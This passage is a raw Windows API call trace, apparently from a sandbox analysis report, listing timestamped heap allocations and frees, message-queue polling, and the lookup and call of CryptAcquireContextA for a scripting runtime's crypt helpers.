lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0133.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0133.007] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0133.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0133.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0133.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0133.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0133.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0133.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0133.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0133.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0133.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0133.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0133.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0133.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0133.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0133.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0133.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0133.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0133.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0133.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0133.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0133.008] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0133.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0133.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0133.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0133.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0133.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0133.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0133.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0133.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0133.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0133.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0133.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0133.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0133.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0133.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0133.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0133.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0133.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0133.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0133.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0133.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0133.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0133.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0133.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0133.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0133.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0133.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0133.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69928, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0133.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0133.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0133.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0133.010] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0133.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0133.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0133.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0133.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0133.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0133.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0133.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0133.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69988 [0133.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69988, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0133.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0133.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0133.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0133.011] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0133.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0133.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0133.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0133.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0133.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0133.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0133.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0133.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0133.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0133.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0133.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0133.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0133.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0133.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0133.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0133.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0133.012] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0133.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0133.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0133.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0133.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0133.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0133.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0133.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0133.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0133.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0133.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0133.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0133.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0133.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0133.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0133.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0133.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0133.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0133.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0133.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0133.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0133.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0133.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0133.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0133.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0133.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0133.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0133.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0133.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0133.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0133.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0133.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0133.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0133.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0133.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0133.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0133.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0133.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0133.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0133.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0133.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0133.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0133.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0133.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0133.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0133.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0133.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0133.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0133.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0133.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0133.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0133.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0133.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0133.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0133.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0133.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0133.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0133.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0133.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0133.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0133.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0133.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0133.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0133.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0133.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0133.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0133.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0133.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0133.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0133.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0133.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0133.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0133.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0133.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0133.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0133.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0133.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0133.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0133.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0133.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0133.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0133.016] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0133.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0133.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0133.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0133.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0133.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0133.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0133.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0133.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0133.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0133.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0133.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0133.017] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0133.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0133.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0133.017] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0133.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0133.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0133.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0133.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0133.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0133.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0133.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0133.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0133.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0133.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0133.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0133.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0133.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0133.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0133.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0133.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0133.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0133.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0133.018] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0133.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0133.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0133.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0133.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0133.018] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0133.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0133.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0133.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0133.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0133.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0133.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0133.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0133.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0133.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0133.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0133.019] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0133.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0133.019] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0133.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0133.019] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0133.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0133.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0133.019] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0133.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0133.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0133.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0133.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0133.019] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0133.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0133.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0133.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0133.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 